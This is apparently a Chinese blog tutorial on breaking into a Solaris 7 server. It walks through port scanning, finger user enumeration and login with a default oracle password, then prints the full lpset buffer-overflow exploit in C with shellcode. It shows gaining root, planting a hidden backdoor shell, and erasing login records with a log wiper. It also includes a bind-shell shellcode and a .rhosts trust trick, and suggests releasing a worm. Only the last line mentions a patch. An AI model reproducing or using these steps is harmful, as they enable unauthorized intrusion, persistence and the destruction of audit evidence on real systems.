今天我想给大家介绍的是Sunos 。 Sunos是一个非常好的Unix操作系统，功能强大。很多大型公司都采用此系统作为服务器系统。（例如：sina、163等。）至于它的漏洞，也是多不胜数的了。今天我就介绍一下这个系统的漏洞。

Unix：Unix操作系统自70年代由贝尔实验室推出以来，80年代经过大学、研究所、工业实验室的应用和发展，现已成为全球各大学、研究所及工业研究室、计算机网络通信、工作站系统的主流工具，并开始进入商业市场和个人电脑领域。尤其是美国在1994年率先提出信息高速公路（Information Super Highway）的构想，更UNIX的发展应用推波助澜。到目前为止UNIX用户已经达到200万户，其成长速度之惊人，前所未有。UNIX提供多用户、多任务的操作环境，其网络工具使计算机远程通信、并行处理、资源分配等有了更广阔的应用前景。尤其是它的X Window系统函盖了传统的DOS命令行和视窗系统的优点。

　

Solaris与Sunos的版本转换：


Solaris 8 = Sunos 5.8，Solaris 7 = Sunos 5.7，Solaris 2.6 = Sunos 5.6，Solaris 2.5 = Sunos 5.5……

因为自Sunos 5以后，就叫Solaris了。

Solaris也有分服务器版和个人版，它们分别是：

服务器版：sparc

个人版：x86

通常个人是不会安装Solaris的。


Solaris主要的漏洞有：

远程漏洞：

RPC：

rpc.ttdbserverd ：Solaris 2.3，2.4， 2.5， 2.5.1， 2.6

rpc.cmsd：Solaris 2.5， 2.5.1， 2.6， 7

其他：

sadmind：solaris 2.6， 7

snmpXdmid：Solaris 7， 8


本地漏洞：

lpset：Solaris 2.6，7




本次范例需要的系统及程序情况如下：

操作系统：Window2000

对方操作系统：Sunos 5.7 （solaris 7）

程序（一）：lpset.c

程序（二）：Superscan 3.0

程序（二）：wipe-1.00

本机IP：127.0.0.1

测试IP：127.0.0.17

新程序说明：

“lpset.c”是利用solaris 7和solaris 2.6的/usr/bin/lpset -a 缓冲区溢出漏洞所写的一个exploit。

Solaris 7 lpset -a 缓冲区溢出漏洞

Solaris 2.6和Solaris 7中所带的lpset缺省设置了suid root位，它的一个执行选项"-a"在处
理时存在问题，它会将提供给"-a"的参数不加判断的拷贝到一个固定大小的buffer(900多字节)
中,当用户提供一个包含可执行代码的很长的字符串时，将导致lpset以root身份执行任意命令。
尽管lpset缺省只允许root和sysadm组的用户执行，但是，由于溢出发生在进行执行权限判断操
作之前，任意本地用户都可以利用这个漏洞获取root权限。


wipe-1.00：unix和liunx下，一个非常好用的日志清除程序。




新名词讲解：

肉鸡：已经被攻击了，具有控制权的主机。

跳板：利用此主机作跳板，攻击其他主机。

shell：shell是系统与用户的交换式界面。简单来说，就是系统与用户的“沟通”环境。我们平时经常用到的DOS，就是一个shell。（Windows2000是cmd.exe）

root：Unix里最高权限的用户。也就是超级管理员。

admin：Windows NT里最高权限的用户。也就是超级管理员。

rootshell：通过一个溢出程序，在主机溢出一个具有root权限的shell。

exploit：溢出程序。exploit里通常包含一些shellcode。

shellcode：溢出攻击要调用API函数，溢出后要有一个交换式界面进行操作。所以就有了shell的code。

char shellcode[] = "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80" "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

这就是一个shellcode。


找一个Unix主机也是一种技巧。

1、首先，我们打开superscan。

设置：

IP：（需要扫描的IP地址。）

Start：127.0.0.1

Stop：127.0.0.255

Scan Type：（扫描类型设置。）


All ports from：23|23

然后，点击“Start”，开始扫描。

2、点击“Prune”，把多余的主机删除。

3、点击“Expand All”，把所有扫描到的主机打开。这时，在端口下面就会显示一些信息。这些信息就是端口的响应。

小技巧：

........#..'..$：这种响应，通常是Sunos主机的。

..... ..#..'：这种响应，通常是liunx的。

假设，我们扫描到：127.0.0.17。

打开，Windows自带的“命令提示符”。



ping 主机：

主要目的是查看主机是否能连接。

D:\>ping 127.0.0.17

Pinging 127.0.0.17 with 32 bytes of data:

Reply from 127.0.0.17: bytes=32 time=191ms TTL=241
Reply from 127.0.0.17: bytes=32 time=170ms TTL=241
Reply from 127.0.0.17: bytes=32 time=160ms TTL=241
Reply from 127.0.0.17: bytes=32 time=170ms TTL=241

Ping statistics for 127.0.0.17:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 160ms, Maximum =  191ms, Average =  172ms


小技巧：

通常 TTL > 200的，都是liunx或者unix系统。

TTL < 200的，都是Windows 9x或Windows NT系统。



telnet主机：

主要看看telnet的banner。



D:\>telnet 127.0.0.17

SunOS 5.7

login:



solaris 7 的。

接着，我用Superscan扫描主机的端口。

方法：

打开superscan。

设置：

IP：

Start：127.0.0.17

Stop：127.0.0.17

Scan Type：（扫描类型设置。）


All ports from：1|65535

然后，点击“Start”，开始扫描。

扫描完毕后，点击“Expand All”，把所有扫描到的端口打开。

* + 211.99.25.1
|___ 7 Echo
|___ 9 Discard
|___ 13 Daytime
|___ 19 Character Generator
|___ 21 File Transfer Protocol [Control]
|___ 23 Telnet
|___ 25 Simple Mail Transfer
|___ 37 Time
|___ 53 Domain Name Server
|___ 79 Finger
|___ 111 SUN Remote Procedure Call
|___ 512 remote process execution;
|___ 513 remote login a la telnet;
|___ 514 cmd
|___ 515 spooler
|___ 540 uucpd


主要的端口有：21、25、53、79、111、513

其他还有：22、80等

端口的主要漏洞：

21：FTP的端口。主要漏洞是ftpd。如果允许anonymous（匿名）用户，而且具有读写权限，那么那台机子就是你的啦。假如你具有读写权限的用户密码，那就更加容易了。

22：ssh的端口。例如：SSH 3.0的远程登录漏洞等。

25：sendmail的端口。利用它的漏洞，我们可以D.O.S主机。freebsd的8.8.3版本还可以远程溢出rootshell。

53：DNS的端口。主要漏洞是bind。对于bind 8.2的DNS服务器，我们可以利用exploit溢出一个rootshell。

79：finger的端口。在unix和liunx都很有作用。对于Sunos，我们可以 finger 0@***.***.***.*** 刺探用户。对于，liunx可以 finger @***.***.***.*** 刺探当前在线的用户。

80：web的端口。这个端口就是我们平时浏览网站的默认端口。主要的漏洞有CGI漏洞。

111：rpc的端口。rpc漏洞是当今最流行的漏洞之一。每一个漏洞都可以远程溢出rootshell。例如：redhat的rpc.statd，Solaris的rpc.ttdbserverd等。

513：rlogin的端口。你可以向主机发送一条：echo '+ +' >/.rhost 如果成功，就可以不用密码rlogin到主机。





finger主机。

目的是利用finger漏洞寻找主机的用户。（取得主机的用户对入侵主机有很大帮助。）

D:\>finger 0@127.0.0.17

[127.0.0.17]
Login       Name               TTY         Idle    When    Where
daemon          ???                         < .  .  .  . >
bin             ???                         < .  .  .  . >
sys             ???                         < .  .  .  . >
chenhy          ???            pts/7        <Aug  2 15:47> 61.158.255.225
mdevice         ???            897          <Aug  4 17:25> 61.140.253.142
liuy            ???            pts/5        <Aug  2 18:17> 211.101.132.50
oracle          ???            console     6:57 Mon 14:29  :0
oracle          ???            pts/2         4d Mon 14:29  :0.0
oracle          ???            pts/5         22 Sat 16:34  61.140.253.142

D:\>

存在finger漏洞。系统的用户显示出来了。（chenhy、mdevice、liuy、orcle）

oracle，通常oracle的密码就是oracle。

马上试一下！

D:\>telnet 127.0.0.17

SunOS 5.7

login: oracle

Password:

Last login: Sat Aug  4 17:25:49 from 61.140.253.142
Sun Microsystems Inc.   SunOS 5.7       Generic October 1998
$

成功了！

假如在这一步并没有猜到用户的密码，我们可以利用其他工具继续猜测。

　

命令：uname -a

查看主机的信息。


$uname -a

SunOS mars 5.7 Generic_106541-08 sun4u sparc SUNW,Ultra-5_10

SunOS mars 5.7：SunOS的版本。

sparc：服务器版本。

Generic_106541-08：补丁情况。

　

找到exploit：lpset.c

$cat >lpst.c

/*## copyright LAST STAGE OF DELIRIUM apr 2000 poland        *://lsd-pl.net/ #*/
/*## /usr/bin/lpset                                                          #*/

#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3

char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
    "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "/bin/ksh"
;

char jump[]=
    "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
    "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
;

static char nop[]="\x80\x1c\x40\x11";

main(int argc,char **argv){
    char buffer[10000],adr[4],*b;
    int i;

    printf("copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd-pl.net/\n");
    printf("/usr/bin/lpset for solaris 2.6 2.7 sparc\n\n");

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10088+400;

    b=buffer;
    sprintf(b,"***=");
    b+=4;
    for(i=0;i<2;i++) *b++=0xff;
    for(i=0;i<NOPNUM-4;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/bin/lpset","lsd","-n","xfn","-a",buffer,"printer",0,0);
}
/*                    www.hack.co.za           [4 August 2000]*/

^D （“^D” = Ctrl+D ，目的是结束。）

　


$cd /tmp

lpset.c放在/tmp目录了。

$ls

lpset.c

建立了。


$gcc -o lpset lpset.c

$


编译程序。



小技巧：Solaris默认是没有gcc的。我们可以用命令“whereis -b gcc”查找。因为管理员通常会在“/usr/local/bin”留下一个gcc的。



命令：chmod 777 lpset

设置程序“lpset”的属性为所有组所有用户都能访问。

$chmod 777 lpset

命令：./lpset

执行程序。

$./lpset
copyright LAST STAGE OF DELIRIUM apr 2000 poland  //lsd-pl.net/
/usr/bin/lpset for solaris 2.6 2.7 sparc

sh: syntax error at line 1: `(' unexpected
#


命令：id

查看自己的所属的组别。

#id

uid=1035(delex) gid=20(staff) euid=0(root)

“euid=0(root)”取得root权限了。

做个后门：

# mkdir /usr/man/man5/shell

在man文件夹里新建一个文件夹，没那么容易给别人发现。（每台主机的情况都不同。）


# cp /bin/ksh /usr/man/man5/shell

# chmod 777 /usr/man/man5/shell

一个简单的后门就做好了。

以后，我们可以用oracle登陆，然后“./usr/man/man5/shell”取得root权限。


　

用wipe-1.00清除日志。

先把wipe-1.00.tgz上传到主机。

通常ftp的密码与telnet的密码一样。

# gzip -d wipe-1.00.tgz

# tar -xf wipe-1.00.tar

# cd wipe-1.00

# make

Wipe v0.01 !

Usage: 'make ' where System types are:

　　linux freebsd sunos4 solaris2 ultrix

　　aix irix digital bsdi netbsd hpux

#

其中：

linux freebsd sunos4 solaris2 ultrix

aix irix digital bsdi netbsd hpux

为“选择系统”。

我们这里用“solaris2”。

#make solaris2

gcc -O3 -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c

成功了。

#./wipe
   USAGE: wipe [ u|w|l|a ] ...options...

UTMP editing:
    Erase all usernames      :   wipe u [username]
    Erase one username on tty:   wipe u [username] [tty]

WTMP editing:
   Erase last entry for user :   wipe w [username]
   Erase last entry on tty   :   wipe w [username] [tty]

LASTLOG editing:
   Blank lastlog for user    :   wipe l [username]
   Alter lastlog entry       :   wipe l [username] [tty] [time] [host]
        Where [time] is in the format [YYMMddhhmm]

ACCT editing:
   Erase acct entries on tty :   wipe a [username] [tty]

说明：

u 选项为 utmp utmpx 日志清除。

w 选项为 wtmp wtmpx 日志清除。

l 选项为 lastlog 日志清除。

a 选项为 pacct 日志清除。

方法：./wipe u oracle;./wipe w oracle;./wipe l oracle

#./wipe u oracle;./wipe w oracle;./wipe l oracle

Patching /var/adm/utmp .... Done.

Patching /var/adm/utmpx .... Done.

Patching /var/adm/wtmp .... Done.

Patching /var/adm/wtmpx .... Done.

Patching /var/adm/lastlog .... Done.

其中oracle为刚才登陆的用户名。

小技巧：我们可以用 ./wipe u oracle 隐藏自己。

运行：./wipe u oracle 前

# w

下午 20:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名 　　终端号 　　登入时间 　　闲置 　　JCPU 　　PCPU 　　执行命令

oracle 　　　pts/1 　　下午 20:00　　　　 　　　3 　　　　　　　　　w

运行：./wipe u oracle 后

# w

下午 20:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名 　　终端号 　　登入时间 　　闲置 　　JCPU 　　PCPU 　　执行命令


最后，我们可以放个worm寻找更多机子。

当然，我们的目的不是为了入侵。帮主机打上补丁是最好的主意。

解决方法：chmod -s /usr/bin/lpset
本文出自 51CTO.COM技术博客